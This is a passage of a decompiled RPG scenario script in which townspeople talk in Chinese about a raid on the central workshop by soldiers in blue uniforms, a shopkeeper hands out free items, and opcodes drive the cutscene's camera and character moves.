TalkBegin(0xFE) TalkEnd(0xFE) Return() # Function_35_2F8F end def Function_36_2F96(): pass label("Function_36_2F96") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 5)), scpexpr(EXPR_END)), "loc_303E") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_END)), "loc_2FE6") ChrTalk( 0xFE, ( "亲卫队的制服……\x01", "的确是让人在意呀。\x02", ) ) CloseMessageWindow() Jump("loc_303E") label("loc_2FE6") OP_A2(0x0) ChrTalk( 0xFE, ( "工房袭击犯竟然\x01", "穿着亲卫队的制服吗。\x02", ) ) CloseMessageWindow() label("loc_303E") TalkEnd(0xFE) Return() # Function_36_2F96 end def Function_37_3042(): pass label("Function_37_3042") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC0, 1)), scpexpr(EXPR_END)), "loc_3159") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 1)), scpexpr(EXPR_END)), "loc_30AF") ChrTalk( 0xFE, ( "呼，\x01", "越来越想不明白了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "买盆花来\x01", "调节一下心情吧……\x02", ) ) CloseMessageWindow() Jump("loc_3156") label("loc_30AF") OP_A2(0x1) ChrTalk( 0xFE, "尽管如此……\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "袭击中央工房的犯人\x01", "到现在都还没抓到吗？\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "王国军和游击士协会\x01", "到底都在干什么呀。\x02", ) ) CloseMessageWindow() label("loc_3156") Jump("loc_34EB") label("loc_3159") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 5)), scpexpr(EXPR_END)), "loc_3204") ChrTalk( 0xFE, ( "很多人都说\x01", "从工房出来的是穿蓝色军装的军人，\x01", "所以应该是不会有错的。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "而且温丝也说他看见了。\x01", "亲卫队果然很可疑啊。\x02", ) ) CloseMessageWindow() Jump("loc_34EB") label("loc_3204") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA1, 6)), scpexpr(EXPR_END)), "loc_3474") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 1)), scpexpr(EXPR_END)), "loc_328F") ChrTalk( 0xFE, ( "我一要买什么，\x01", "温丝就处处有意见。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "真是的，\x01", "这个孩子就喜欢斤斤计较。\x02", ) ) CloseMessageWindow() Jump("loc_3471") label("loc_328F") OP_A2(0x1) TurnDirection(0xD, 0x107, 400) ChrTalk( 0xFE, ( "呀，提妲，\x01", "在为客人带路吗？\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, ( "#060F啊，您好，阿利瑟阿姨。\x02\x03", "在挑选鲜花吗？\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, "哎，是呀……\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "我一要买什么，\x01", "温丝就处处有意见。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "真是的，\x01", "这个孩子就喜欢斤斤计较。\x02", ) ) CloseMessageWindow() TurnDirection(0x10, 0xD, 400) ChrTalk( 0x10, ( "不是我斤斤计较，\x01", "而是妈妈太浪费啦。\x02", ) ) CloseMessageWindow() OP_8C(0x10, 0, 300) OP_62(0xD, 0x0, 2000, 0xC, 0xD, 0xFA, 0x2) OP_22(0x31, 0x0, 0x64) Sleep(1000) ChrTalk( 0xFE, "你说什么！？\x02", ) CloseMessageWindow() OP_62(0x107, 0x0, 2000, 0x10, 0x13, 0xFA, 0x1) OP_22(0x31, 0x0, 0x64) Sleep(1000) ChrTalk( 0x107, "#065F哎，这个……请别生气……\x02", ) CloseMessageWindow() label("loc_3471") Jump("loc_34EB") label("loc_3474") ChrTalk( 0xFE, "哇，好漂亮的花呀。\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "不过种在阳台上的话，\x01", "颜色有些不合适。\x02", ) ) CloseMessageWindow() label("loc_34EB") TalkEnd(0xFE) Return() # Function_37_3042 end def Function_38_34EF(): pass label("Function_38_34EF") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 5)), scpexpr(EXPR_END)), "loc_35C4") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 2)), scpexpr(EXPR_END)), "loc_358D") ChrTalk( 0xFE, ( "就连亲卫队\x01", "也在这里出现了……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "如果顺利的话，\x01", "我就能出名啦。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "决定了！\x01", "我一定要成为工房的接待小姐。\x02", ) ) CloseMessageWindow() Jump("loc_35C4") label("loc_358D") OP_A2(0x2) ChrTalk( 0xFE, "哎！亲卫队！\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "如果顺利的话，\x01", "我就能出名啦。\x02", ) ) CloseMessageWindow() label("loc_35C4") TalkEnd(0xFE) Return() # Function_38_34EF end def Function_39_35C8(): pass label("Function_39_35C8") TalkBegin(0xFE) ChrTalk( 0xFE, ( "看起来\x01", "不像是火灾呀……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, "但那么多烟是怎么回事呢？\x02", ) CloseMessageWindow() TalkEnd(0xFE) Return() # Function_39_35C8 end def Function_40_3615(): pass label("Function_40_3615") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC0, 1)), scpexpr(EXPR_END)), "loc_371F") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 3)), scpexpr(EXPR_END)), "loc_36A0") ChrTalk( 0xFE, ( "结果最后还是不知道\x01", "那些穿军装的人的真面目。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "他们到底\x01", "是什么人呢。\x02", ) ) CloseMessageWindow() Jump("loc_371C") label("loc_36A0") OP_A2(0x3) ChrTalk( 0xFE, ( "妈妈，王国军和协会\x01", "都已经尽力去调查了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "只不过那些情况\x01", "是不可能让我们知道的。\x02", ) ) CloseMessageWindow() label("loc_371C") Jump("loc_388C") label("loc_371F") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAB, 5)), scpexpr(EXPR_END)), "loc_378B") ChrTalk( 0xFE, ( "妈妈，我看见的是\x01", "『穿蓝色军装的军人』。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "我可没说过\x01", "我看见的是亲卫队哦。\x02", ) ) CloseMessageWindow() Jump("loc_388C") label("loc_378B") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA1, 6)), scpexpr(EXPR_END)), "loc_3856") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 3)), scpexpr(EXPR_END)), "loc_37D5") TurnDirection(0xFE, 0x107, 0) ChrTalk( 0xFE, ( "提妲，\x01", "工房的工作要加油哦。\x02", ) ) CloseMessageWindow() Jump("loc_3853") label("loc_37D5") TurnDirection(0xFE, 0x107, 0) OP_A2(0x3) ChrTalk( 0xFE, "提妲，你好啊。\x02", ) CloseMessageWindow() ChrTalk( 0x107, "#560F你好，温丝。\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "今天也要去工房工作吗？\x01", "要加油哦。\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, "#061F嗯，谢谢。\x02", ) CloseMessageWindow() label("loc_3853") Jump("loc_388C") label("loc_3856") ChrTalk( 0xFE, ( "妈妈，\x01", "阳台的花坛已经放满花盆了呀。\x02", ) ) CloseMessageWindow() label("loc_388C") TalkEnd(0xFE) Return() # Function_40_3615 end def Function_41_3890(): pass label("Function_41_3890") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 7)), scpexpr(EXPR_END)), "loc_3A4F") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 4)), scpexpr(EXPR_END)), "loc_3972") ChrTalk( 0xFE, ( "好了，\x01", "我也差不多该回店里去了……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "擅自把商品分发给大家，\x01", "妻子一定会很生气吧。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "但能对大家有点用，\x01", "我就非常满足了。\x02", ) ) CloseMessageWindow() Jump("loc_3A4C") label("loc_3972") OP_A2(0x4) ChrTalk( 0xFE, ( "呼，\x01", "看来烟总算是散了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "听说没有人受伤，\x01", "真是太好了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "虽然有东西被偷走了，\x01", "只要再做个一样的不就行了吗。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "好了，\x01", "我也差不多该回店里去了。\x02", ) ) CloseMessageWindow() label("loc_3A4C") Jump("loc_3D86") label("loc_3A4F") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 0)), scpexpr(EXPR_END)), "loc_3D86") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 4)), scpexpr(EXPR_END)), "loc_3A9E") ChrTalk( 0xFE, ( "遇到有困难的人\x01", "一定要帮助他们啊。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, "那么，你们要小心哦！\x02", ) CloseMessageWindow() Jump("loc_3D86") label("loc_3A9E") OP_A2(0x4) ChrTalk( 0xFE, "你们没事吧。\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "我是杂货店的埃尔文。\x01", "一听到有事就赶来了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "我从店里带来很多东西，\x01", "想要什么就尽管说吧。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "在这种非常时刻，\x01", "当然不会收你们钱。\x02", ) ) CloseMessageWindow() Sleep(100) FadeToDark(300, 0, 100) OP_4F(0x28, (scpexpr(EXPR_PUSH_LONG, 0x18), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Menu( 0, 10, 100, 0, ( "【替身木偶】\x01", # 0 "【圣灵药】\x01", # 1 "【石化之刃】\x01", # 2 ) ) MenuEnd(0x2) OP_4F(0x28, (scpexpr(EXPR_PUSH_LONG, 0xFFFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_5F(0x0) FadeToBright(300, 0) Jc((scpexpr(EXPR_GET_RESULT, 0x2), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_3C76") OP_22(0x11, 0x0, 0x64) FadeToDark(300, 0, 100) SetChrName("") SetMessageWindowPos(-1, -1, -1, -1) AnonymousTalk( ( scpstr(SCPSTR_CODE_COLOR, 0x0), "得到了\x07\x02", "替身木偶\x07\x00", "。\x02", ) ) CloseMessageWindow() OP_56(0x0) FadeToBright(300, 0) SetMessageWindowPos(72, 320, 56, 3) OP_3E(0x145, 1) Jump("loc_3D30") label("loc_3C76") Jc((scpexpr(EXPR_GET_RESULT, 0x2), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_3CDB") OP_22(0x11, 0x0, 0x64) FadeToDark(300, 0, 100) SetChrName("") SetMessageWindowPos(-1, -1, -1, -1) AnonymousTalk( ( scpstr(SCPSTR_CODE_COLOR, 0x0), "得到了\x07\x02", "圣灵药\x07\x00", "。\x02", ) ) CloseMessageWindow() OP_56(0x0) FadeToBright(300, 0) SetMessageWindowPos(72, 320, 56, 3) OP_3E(0x1FD, 1) Jump("loc_3D30") label("loc_3CDB") OP_22(0x11, 0x0, 0x64) FadeToDark(300, 0, 100) SetChrName("") SetMessageWindowPos(-1, -1, -1, -1) AnonymousTalk( ( scpstr(SCPSTR_CODE_COLOR, 0x0), "得到了\x07\x02", "石化之刃\x07\x00", "。\x02", ) ) CloseMessageWindow() OP_56(0x0) FadeToBright(300, 0) SetMessageWindowPos(72, 320, 56, 3) OP_3E(0x27F, 1) label("loc_3D30") Sleep(100) ChrTalk( 0xFE, "好，这个就给你们了。\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "如果遇到有困难的人\x01", "一定要帮助他们啊。\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, "那么，你们要小心哦！\x02", ) CloseMessageWindow() label("loc_3D86") TalkEnd(0xFE) Return() # Function_41_3890 end def Function_42_3D8A(): pass label("Function_42_3D8A") TalkBegin(0xFE) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA7, 0)), scpexpr(EXPR_END)), "loc_3ECC") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 5)), scpexpr(EXPR_END)), "loc_3E41") ChrTalk( 0xFE, ( "可是，我不在的时候\x01", "竟然发生这样的事……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "冈多夫先生外出时让我留守，\x01", "发生了这样的事，我简直没脸见他。\x02", ) ) CloseMessageWindow() Jump("loc_3EC9") label("loc_3E41") OP_A2(0x5) ChrTalk( 0xFE, ( "工房被袭击了……\x01", "竟然会发生这样的事……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "总之要先回协会，\x01", "确认一下状况才行……\x02", ) ) CloseMessageWindow() label("loc_3EC9") Jump("loc_437F") label("loc_3ECC") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 7)), scpexpr(EXPR_END)), "loc_437F") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 5)), scpexpr(EXPR_END)), "loc_3F80") ChrTalk( 0xFE, ( "我不在的时候\x01", "竟然发生这样的事……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "冈多夫先生外出时让我留守，\x01", "发生了这样的事，我简直没脸见他。\x02", ) ) CloseMessageWindow() Jump("loc_437F") label("loc_3F80") OP_A2(0x5) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAF, 4)), scpexpr(EXPR_EXEC_OP, "OP_29(0x28, 0x0, 0x4)"), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_42FA") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xB9, 5)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_4272") OP_A2(0x5CD) TurnDirection(0xFE, 0x101, 0) ChrTalk( 0xFE, "啊！是你们！\x02", ) CloseMessageWindow() ChrTalk( 0x101, "#501F啊，是王先生……\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "我、我刚刚\x01", "才回到蔡斯……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, "这到底发生什么事了！？\x02", ) CloseMessageWindow() ChrTalk( 0x101, "#003F嗯，其实啊……\x02", ) CloseMessageWindow() TurnDirection(0x106, 0x101, 400) ChrTalk( 0x106, ( "#050F喂，你在干什么。\x02\x03", "赶快回协会去吧。\x01", "我们可没时间再磨蹭了。\x02", ) ) CloseMessageWindow() OP_62(0x101, 0x0, 2000, 0xE, 0xF, 0xFA, 0x2) OP_22(0x31, 0x0, 0x64) TurnDirection(0x101, 0x106, 400) Sleep(400) ChrTalk( 0x101, ( "#009F唔唔……\x02\x03", "#007F哼，虽然不甘心，\x01", "但阿加特说得没错。\x02", ) ) CloseMessageWindow() TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, "#018F……有什么不甘心的。\x02", ) CloseMessageWindow() TurnDirection(0x106, 0x12, 400) ChrTalk( 0x106, ( "#053F还有你。\x02\x03", "作为游击士，\x01", "应该自己去确认当前的状况。\x02", ) ) CloseMessageWindow() TurnDirection(0xFE, 0x106, 400) ChrTalk( 0xFE, "……确实是这样。\x02", ) CloseMessageWindow() ChrTalk( 0xFE, ( "不好意思，\x01", "我有点自乱阵脚了……\x02", ) ) CloseMessageWindow() ChrTalk( 0x106, ( "#053F呼……\x02\x03", "算了，既然已经发生了，\x01", "现在就考虑一下对策吧。\x02\x03", "#050F……喂，走啦。\x02", ) ) CloseMessageWindow() def lambda_421A(): TurnDirection(0x102, 0x12, 400) ExitThread() QueueWorkItem(0x102, 1, lambda_421A) TurnDirection(0x101, 0x12, 400) ChrTalk( 0x101, "#000F回头见，王先生……\x02", ) CloseMessageWindow() TurnDirection(0xFE, 0x101, 0) ChrTalk( 0xFE, "啊啊，刚刚真是对不起。\x02", ) CloseMessageWindow() ChrTalk( 0x102, "#010F那么我们就告辞了。\x02", ) CloseMessageWindow() Jump("loc_42F7") label("loc_4272") ChrTalk( 0xFE, ( "工房被袭击了……\x01", "竟然会发生这样的事……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "总之要先回协会，\x01", "确认一下状况才行……\x02", ) ) CloseMessageWindow() label("loc_42F7") Jump("loc_437F") label("loc_42FA") ChrTalk( 0xFE, ( "工房被袭击了……\x01", "竟然会发生这样的事……\x02", ) ) CloseMessageWindow() ChrTalk( 0xFE, ( "总之要先回协会，\x01", "确认一下状况才行……\x02", ) ) CloseMessageWindow() label("loc_437F") TalkEnd(0xFE) Return() # Function_42_3D8A end def Function_43_4383(): pass label("Function_43_4383") OP_A3(0x540) OP_A3(0x541) OP_A3(0x546) OP_A3(0x543) OP_A3(0x544) OP_A3(0x545) OP_A2(0x546) Return() # Function_43_4383 end def Function_44_4399(): pass label("Function_44_4399") OP_22(0x74, 0x0, 0x64) Sleep(300) OP_22(0x74, 0x0, 0x64) Sleep(300) FadeToDark(300, 0, 100) AnonymousTalk( ( scpstr(SCPSTR_CODE_COLOR, 0x5), "按了按钮，没有任何反应。\x01", "导力梯好像不能用了。\x02", ) ) CloseMessageWindow() OP_56(0x0) FadeToBright(300, 0) SetMessageWindowPos(72, 320, 56, 3) TalkEnd(0xFF) Return() # Function_44_4399 end def Function_45_4421(): pass label("Function_45_4421") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 3)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_451A") EventBegin(0x1) Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0xA), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_449C") TurnDirection(0x102, 0x1, 400) ChrTalk( 0x102, ( "#012F我担心博士的情况。\x01", "赶快去工房里面调查一下吧。\x02", ) ) CloseMessageWindow() Jump("loc_44FC") label("loc_449C") TurnDirection(0x102, 0x0, 400) ChrTalk( 0x102, ( "#012F我担心博士的情况。\x01", "赶快去工房里面调查一下吧。\x02", ) ) CloseMessageWindow() label("loc_44FC") OP_90(0x0, 0xFFFFFA24, 0x0, 0x0, 0xBB8, 0x0) Sleep(50) EventEnd(0x4) Jump("loc_477E") label("loc_451A") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA1, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_477E") OP_A2(0x50B) ClearMapFlags(0x1) EventBegin(0x0) OP_8C(0x102, 90, 0) OP_8C(0x101, 90, 0) OP_62(0x101, 0x0, 2000, 0x2, 0x7, 0x50, 0x1) OP_22(0x27, 0x0, 0x64) OP_62(0x102, 0x0, 2000, 0x2, 0x7, 0x50, 0x1) OP_22(0x27, 0x0, 0x64) Sleep(1000) ChrTalk( 0x101, "#004F这，这是什么？\x02", ) CloseMessageWindow() Sleep(100) Fade(500) OP_6D(6010, 2000, 59020, 0) OP_67(0, 2920, -10000, 0) OP_6B(3630, 0) OP_6C(270000, 0) OP_6E(262, 0) SetChrPos(0x101, -13400, 8000, 59680, 90) SetChrPos(0x102, -13620, 8000, 58750, 90) OP_0D() def lambda_45FA(): OP_6D(-13820, 9000, 59010, 6000) ExitThread() QueueWorkItem(0x101, 2, lambda_45FA) Sleep(1000) OP_67(0, 11000, -10000, 5000) WaitChrThread(0x101, 0x2) Sleep(1000) Fade(1000) OP_6D(-13480, 8000, 59160, 0) OP_67(0, 11000, -10000, 0) OP_6B(2800, 0) OP_6C(314000, 0) OP_6E(262, 0) OP_0D() ChrTalk( 0x102, ( "#014F好像是……会移动的楼梯。\x02\x03", "这楼梯看上去好长啊，\x01", "自己走下去应该会很辛苦……\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#007F话、话是这样说，\x01", "但是用机械移动也太……\x02\x03", "#509F自从到了这个城镇之后，\x01", "感觉除了惊讶之外就没有其他反应了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, "#019F我也有同感。\x02", ) CloseMessageWindow() EventEnd(0x0) label("loc_477E") Return() # Function_45_4421 end def Function_46_477F(): pass label("Function_46_477F") ClearMapFlags(0x1) EventBegin(0x0) OP_6D(-35180, 10000, 58970, 0) OP_6B(2410, 0) OP_6C(270000, 0) SetChrPos(0x101, -34470, 10000, 59690, 225) SetChrPos(0x102, -34480, 10000, 58410, 315) SetChrPos(0x107, -35490, 10000, 59000, 90) FadeToBright(1000, 0) OP_0D() Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xBA, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_497F") ChrTalk( 0x101, ( "#501F亚尔摩村啊～\x01", "我已经开始有点期待呢。\x02\x03", "那里是个以温泉著名的胜地吧？\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, ( "#061F是的。\x01", "是个非常棒的地方哦。\x02\x03", "之前我跟爷爷\x01", "去过那里好几次呢。\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, ( "#010F要去那个村子的话，\x01", "该怎么走呢？\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, ( "#560F我想想。\x02\x03", "出了城镇的南面出口\x01", "就是宽广的平原道……\x02\x03", "沿着托兰特平原道\x01", "一直向南走就到了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#006FＯＫ！\x01", "沿着平原道一直往南走对吧。\x02\x03", "#001F那么，我们出发吧！\x02", ) ) CloseMessageWindow() Jump("loc_4AD0") label("loc_497F") ChrTalk( 0x101, ( "#501F亚尔摩村啊～\x01", "我已经开始有点期待呢。\x02\x03", "那里是个以温泉著名的胜地吧？\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, ( "#061F是的。\x01", "是个非常棒的地方哦。\x02\x03", "之前我跟爷爷\x01", "去过那里好几次呢。\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, ( "#010F的确是个让人期待的地方，\x01", "那么我们就赶快前往亚尔摩吧。\x02\x03", "是从南面的门口出去对吧？\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, ( "#560F是呢，出去之后，\x01", "沿着托兰特平原道向南走就到了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#006FＯＫ！\x01", "那么，我们出发吧！\x02", ) ) CloseMessageWindow() label("loc_4AD0") OP_28(0x40, 0x1, 0x1) EventEnd(0x0) Return() # Function_46_477F end def Function_47_4AD9(): pass label("Function_47_4AD9") EventBegin(0x0) OP_28(0x41, 0x4, 0x2) OP_28(0x41, 0x4, 0x4) OP_28(0x41, 0x1, 0x1) OP_72(0x0, 0x10) OP_6F(0x0, 60) OP_4A(0x21, 0) OP_4A(0x11, 0) OP_4A(0x1F, 0) OP_6D(-14970, 8000, 55370, 0) OP_67(0, 11000, -10000, 0) OP_6B(3000, 0) OP_6C(224000, 0) OP_4A(0xA, 255) OP_4A(0x9, 255) OP_4A(0xB, 255) OP_4A(0x8, 255) ClearChrFlags(0x8, 0x80) ClearChrFlags(0x9, 0x80) ClearChrFlags(0xB, 0x80) ClearChrFlags(0xA, 0x80) RemoveParty(0xF, 0xFF) SetChrPos(0x101, -14050, 8000, 56120, 270) SetChrPos(0x102, -13280, 8000, 55260, 270) SetChrPos(0x107, -13040, 8000, 57050, 270) SetChrPos(0x8, -12520, 8000, 56020, 270) SetChrPos(0x1C, -37650, 10000, 59010, 0) SetChrPos(0x1B, -37650, 10000, 59010, 0) SetChrPos(0x17, -37650, 10000, 59010, 0) SetChrPos(0xB, -37650, 10000, 59010, 0) SetChrPos(0xA, -37650, 10000, 59010, 0) SetChrPos(0x9, -26520, 8000, 57300, 0) SetChrFlags(0x1C, 0x80) SetChrFlags(0x1B, 0x80) SetChrFlags(0x17, 0x80) SetChrFlags(0xB, 0x80) def lambda_4C22(): label("loc_4C22") TurnDirection(0xFE, 0xA, 0) OP_48() Jump("loc_4C22") QueueWorkItem2(0xB, 1, lambda_4C22) def lambda_4C33(): OP_8E(0xFE, 0xFFFF9E12, 0x1F40, 0xE2CC, 0x1388, 0x0) ExitThread() QueueWorkItem(0xB, 2, lambda_4C33) FadeToBright(2000, 0) OP_20(0x5DC) OP_0D() OP_21() OP_1D(0x51) ChrTalk( 0x101, "#004F啊啊！？\x02", ) CloseMessageWindow() def lambda_4C73(): OP_6D(-25700, 8000, 55810, 2000) ExitThread() QueueWorkItem(0x101, 2, lambda_4C73) FadeToDark(1000, 0, -1) OP_0D() OP_44(0x101, 0xFF) FadeToBright(2000, 0) StopSound(0x0, 0x3D090, 0x0) OP_6D(-35690, 20250, 58940, 0) OP_67(0, 20360, -10000, 0) OP_6B(3390, 0) OP_6C(294000, 0) SetChrFlags(0x1C, 0x80) SetChrFlags(0x1B, 0x80) SetChrFlags(0x17, 0x80) SetChrFlags(0xB, 0x80) SetChrFlags(0x11, 0x80) SetChrFlags(0x22, 0x80) SetChrFlags(0x23, 0x80) SetChrFlags(0x1C, 0x40) SetChrFlags(0x1B, 0x40) SetChrFlags(0x17, 0x40) SetChrFlags(0xB, 0x40) SetChrFlags(0x11, 0x40) SetChrFlags(0x22, 0x40) SetChrFlags(0x23, 0x40) SetChrFlags(0x11, 0x4) SetChrFlags(0x22, 0x4) SetChrFlags(0x23, 0x4) SetChrFlags(0xA, 0x80) OP_4A(0x21, 0) OP_4A(0x11, 0) OP_4A(0x1F, 0) OP_4A(0x1C, 0) OP_4A(0x1B, 0) OP_4A(0x17, 0) OP_4A(0xB, 0) OP_4A(0xA, 0) OP_4A(0x24, 0) SetChrPos(0x11, -37650, 10000, 59010, 0) SetChrPos(0x22, -37650, 10000, 59010, 0) SetChrPos(0x23, -37650, 10000, 59010, 0) StopSound(0x0, 0x0, 0x2710) def lambda_4DA2(): OP_6C(225000, 11000) ExitThread() QueueWorkItem(0x102, 3, lambda_4DA2) ClearChrFlags(0xB, 0x80) def lambda_4DB7(): label("loc_4DB7") TurnDirection(0xFE, 0xA, 0) OP_48() Jump("loc_4DB7") QueueWorkItem2(0xB, 1, lambda_4DB7) def lambda_4DC8(): OP_8E(0xFE, 0xFFFF9E12, 0x1F40, 0xE2CC, 0xFA0, 0x0) ExitThread() QueueWorkItem(0xB, 2, lambda_4DC8) Sleep(500) ClearChrFlags(0x11, 0x80) def lambda_4DED(): label("loc_4DED") OP_8C(0xFE, 166, 0) OP_48() Jump("loc_4DED") QueueWorkItem2(0x11, 1, lambda_4DED) def lambda_4DFE(): OP_8E(0xFE, 0xFFFF7CAC, 0x2710, 0xF000, 0x1388, 0x0) ExitThread() QueueWorkItem(0x11, 2, lambda_4DFE) Sleep(500) ClearChrFlags(0x17, 0x80) def lambda_4E23(): label("loc_4E23") OP_8C(0xFE, 90, 0) OP_48() Jump("loc_4E23") QueueWorkItem2(0x17, 1, lambda_4E23) def lambda_4E34(): OP_8E(0xFE, 0xFFFF8D0A, 0x1F40, 0xDF84, 0xFA0, 0x0) ExitThread() QueueWorkItem(0x17, 2, lambda_4E34) Sleep(1000) ClearChrFlags(0x22, 0x80) def lambda_4E59(): label("loc_4E59") OP_8C(0xFE, 296, 0) OP_48() Jump("loc_4E59") QueueWorkItem2(0x22, 1, lambda_4E59) def lambda_4E6A(): OP_8E(0xFE, 0xFFFF7F36, 0x2710, 0xDBF6, 0xFA0, 0x0) ExitThread() QueueWorkItem(0x22, 2, lambda_4E6A) def lambda_4E85(): OP_6D(-35440, 14790, 58910, 5000) ExitThread() QueueWorkItem(0x101, 1, lambda_4E85) Sleep(1000) def lambda_4EA2(): OP_67(0, 12040, -10000, 4000) ExitThread() QueueWorkItem(0x101, 2, lambda_4EA2) ClearChrFlags(0x23, 0x80) def lambda_4EBF(): label("loc_4EBF") OP_8C(0xFE, 330, 0) OP_48() Jump("loc_4EBF") QueueWorkItem2(0x23, 1, lambda_4EBF) def lambda_4ED0(): OP_8E(0xFE, 0xFFFF7E6E, 0x2710, 0xD886, 0x1388, 0x0) ExitThread() QueueWorkItem(0x23, 2, lambda_4ED0) Sleep(1000) ClearChrFlags(0x1C, 0x80) def lambda_4EF5(): label("loc_4EF5") OP_8C(0xFE, 0, 0) OP_48() Jump("loc_4EF5") QueueWorkItem2(0x1C, 1, lambda_4EF5) def lambda_4F06(): OP_8E(0xFE, 0xFFFF9642, 0x1F40, 0xE8E4, 0x1388, 0x0) ExitThread() QueueWorkItem(0x1C, 2, lambda_4F06) Sleep(1000) ClearChrFlags(0x1B, 0x80) def lambda_4F2B(): label("loc_4F2B") OP_8C(0xFE, 90, 0) OP_48() Jump("loc_4F2B") QueueWorkItem2(0x1B, 1, lambda_4F2B) def lambda_4F3C(): 